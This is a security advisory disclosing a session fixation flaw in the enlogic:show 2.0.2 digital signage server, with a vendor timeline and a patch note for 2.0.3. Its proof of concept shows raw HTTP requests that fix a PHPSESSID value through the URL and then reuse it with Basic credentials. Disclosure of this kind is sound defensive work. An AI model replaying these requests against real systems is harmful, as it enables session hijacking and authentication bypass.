All-Dynamics Software enlogic:show Digital Signage System 2.0.2 Session Fixation

2020-07-31T00:00:00
ID ZSL-2020-5577
Type zeroscience
Reporter Gjoko Krstic
Modified 2020-07-31T00:00:00

Description

Title: All-Dynamics Software enlogic:show Digital Signage System 2.0.2 Session Fixation
Advisory ID: ZSL-2020-5577
Type: Local/Remote
Impact: Security Bypass, Privilege Escalatio, Cross-Site Scripting
Risk: (3/5)
Release Date: 31.07.2020

Summary

Bring communication with your customers, guests or employees to a new level. You can design content individually and uncomplicated centrally and simply present it in different locations. Whether on large displays, steles, digital signs or on a projector, with enlogic:show your content will appear on the selected display in a calendar-controlled and precise manner.

Description

The initial visit from the welcome.php screen to the login page sets a random PHP session identifier in the URL using HTTP GET request. An attacker can forge the request sent to the victim setting a fixated PHP session that can be used to bypass authentication and execute further attacks via CSRF.

Vendor

All-Dynamics Software GmbH - <https://www.all-dynamics.de>

Affected Version

2.0.2 (Build 2098) ILP32W 0/1/3/1597919619

Tested On

enlogic:show server
Microsoft Windows Server 2019
Microsoft Windows Server 2016
Microsoft Windows Server 2012
Microsoft Windows 10
GNU/Linux
Apache
PHP

Vendor Status

[21.07.2020] Vulnerability discovered.
[24.07.2020] Vendor contacted.
[24.07.2020] Vendor creates Ticket#2020072410000011.
[27.07.2020] Vendor responds asking more details.
[27.07.2020] Sent details to the vendor.
[29.07.2020] Vendor confirms the issue scheduling new fixed version release.
[29.07.2020] Replied to the vendor.
[31.07.2020] Vendor releases version 2.0.3 (Build 2102) that addresses this issue.
[31.07.2020] Coordinated public security advisory release.

PoC

enlogic_fixation.txt

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>

References

[1] <https://www.enlogic-show.com/support/changelog/news/2_0_3.html>
[2] <https://packetstormsecurity.com/files/158703>
[3] <https://exchange.xforce.ibmcloud.com/vulnerabilities/186246>

Changelog

[31.07.2020] - Initial release
[14.08.2020] - Added reference [2] and [3]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

                                        
                                            
All-Dynamics Software enlogic:show Digital Signage System 2.0.2 Session Fixation


Vendor: All-Dynamics Software GmbH
Vendor web page: https://www.all-dynamics.de
Product web page: https://www.enlogic-show.com
Affected version: 2.0.2 (Build 2098) ILP32W 0/1/3/1597919619

Summary: Bring communication with your customers, guests or employees
to a new level. You can design content individually and uncomplicated
centrally and simply present it in different locations. Whether on large
displays, steles, digital signs or on a projector, with enlogic:show your
content will appear on the selected display in a calendar-controlled and
precise manner.

Desc: The initial visit from the welcome.php screen to the login page
sets a random PHP session identifier in the URL using HTTP GET request.
An attacker can forge the request sent to the victim setting a fixated
PHP session that can be used to bypass authentication and execute further
attacks via CSRF.

Tested on: enlogic:show server
           Microsoft Windows Server 2019
           Microsoft Windows Server 2016
           Microsoft Windows Server 2012
           Microsoft Windows 10
           GNU/Linux
           Apache
           PHP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5577
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5577.php


21.07.2020

--


Visiting the following GET request sets the PHP session:
--------------------------------------------------------

GET /index.php?PHPSESSID=5adb40dac43ddf2d05ea83d1a958ed65 HTTP/1.1
Host: localhost:8802

HTTP/1.0 302 Moved Temporarily
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /index.php?PHPSESSID=5adb40dac43ddf2d05ea83d1a958ed65
Content-type: text/html


Victim is redirected to authorize:
----------------------------------

HTTP/1.0 401 Authorization Required
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
WWW-Authenticate: Basic realm="enlogic.show server"
Content-type: text/html


Session fixated:
----------------

GET /index.php?PHPSESSID=5adb40dac43ddf2d05ea83d1a958ed65 HTTP/1.1
Host: localhost:8802
Connection: keep-alive
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9


HTTP/1.0 200 OK
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html